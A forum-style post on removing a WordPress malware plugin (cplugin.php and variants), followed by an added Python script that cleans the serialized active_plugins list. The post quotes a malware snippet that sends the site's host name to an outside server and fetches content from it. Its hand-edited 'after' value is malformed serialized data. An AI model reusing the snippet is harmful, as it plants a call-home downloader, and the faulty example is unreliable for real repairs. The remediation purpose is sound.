There is a recent attack where numerous WordPress websites are taken down due to a file cplugin.php, which is malware.
The malware is badly written code, so for now it is mostly causing 500 server runtime errors. But it is better to delete it immediately, as it migrates to all the websites on the server and has code to hit a malware URL to download additional files. A snippet of the malware code:
if(get_option('log_install') !=='1')
{
if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
$log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}
I have figured out a solution and am posting the answer myself to help all users out there.
Edit:
There are reports of the same file being named differently for users: ccode.php, cplugin.php and helad.php, in which case the fix can be modified.
This seems like some sort of global attack. There is a file cplugin.php in the plugins folder which is causing the site to go down. Deleting the file is of no use as it re-appears. Also, it will infect all other sites on a multi-website server. Fortunately, after working for hours, I have figured out the fix. Please read this carefully to fix your site:
Back up your database and files.
Edit your wp_options table, find the property active_plugins and edit it; you will see it has a plugin entry for cplugin.php. We have to delete it. Your initial data will look something like this:
a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....
Edit this to remove the cplugin.php entry: start from the i and go up to the next ; and remove that. (Make sure your database is backed up in case you make a mistake.) The new entry without cplugin.php will look like:
a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....
site_transient_update_plugins
before: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....
after: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....
After updating your fields, navigate back to your main plugins folder /wp-content/plugins and delete the file cplugin.php.
Log in to your WordPress dashboard and re-activate all your plugins.
Voila, you have fixed your website.
I think the technical reason for this would be that the malware registers itself as a WordPress plugin, which automatically replaces the file upon deletion. Fortunately the malware is badly written code, so instead of running it mostly throws 500 errors. But in any case I would recommend deleting it immediately in case it updates.
Edit: According to the WordPress forum thread on this topic, for some users simply renaming the file also makes the website work, which is probably due to the fact that renaming files in WordPress deactivates the plugin, due to which websites start working. But I would not keep infected files renamed and stored in any case, so I would recommend the first solution, at least after gaining access to the site.
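As an added example (not part of the original post), here is a small Python script that parses the PHP-serialized active_plugins value shown above, drops the plugin entries named in the post (cplugin.php, ccode.php, helad.php) and re-serializes the list with the element count and indices updated; the sample input is a constructed, shortened copy of the value in the post, and the parser handles only this flat array-of-strings layout, not the stdClass value of site_transient_update_plugins.

```python
import re

# Constructed sample: a shortened copy of the active_plugins value quoted in the post.
SAMPLE = ('a:5:{i:0;s:27:"carousel-anything/index.php";'
          'i:1;s:36:"contact-form-7/wp-contact-form-7.php";'
          'i:2;s:11:"cplugin.php";'
          'i:3;s:32:"duplicate-page/duplicatepage.php";'
          'i:4;s:31:"envato-market/envato-market.php";}')

ENTRY = re.compile(rb'i:(\d+);s:(\d+):"')  # one "int key => string value" pair

def parse_plugin_list(serialized):
    """Parse a PHP-serialized array of strings, a:N:{i:k;s:len:"...";...}, into a list.
    PHP string lengths are byte counts, so the work is done on bytes."""
    data = serialized.encode("utf-8")
    head = re.match(rb'a:(\d+):\{', data)
    if not head:
        raise ValueError("not a serialized PHP array")
    count, pos, items = int(head.group(1)), head.end(), []
    for _ in range(count):
        entry = ENTRY.match(data, pos)
        if not entry:
            raise ValueError("unexpected token at offset %d" % pos)
        length, start = int(entry.group(2)), entry.end()
        value = data[start:start + length]
        # The declared length must land exactly on the closing quote and semicolon.
        if data[start + length:start + length + 2] != b'";':
            raise ValueError("string length does not match declared length")
        items.append(value.decode("utf-8"))
        pos = start + length + 2
    if data[pos:pos + 1] != b'}':
        raise ValueError("missing closing brace")
    return items

def serialize_plugin_list(items):
    """Re-serialize with fresh 0-based indices and a correct element count."""
    body = "".join('i:%d;s:%d:"%s";' % (i, len(p.encode("utf-8")), p)
                   for i, p in enumerate(items))
    return "a:%d:{%s}" % (len(items), body)

def remove_plugins(serialized, unwanted=("cplugin.php", "ccode.php", "helad.php")):
    """Return (cleaned serialized value, list of entries that were removed)."""
    items = parse_plugin_list(serialized)
    removed = [p for p in items if p in unwanted]
    return serialize_plugin_list([p for p in items if p not in unwanted]), removed

if __name__ == "__main__":
    cleaned, removed = remove_plugins(SAMPLE)
    print("removed:", removed)
    print(cleaned)
```

Paste the printed value back into wp_options only after backing up the database, as the post says, and check the round trip (parse then serialize) on your real value before writing it.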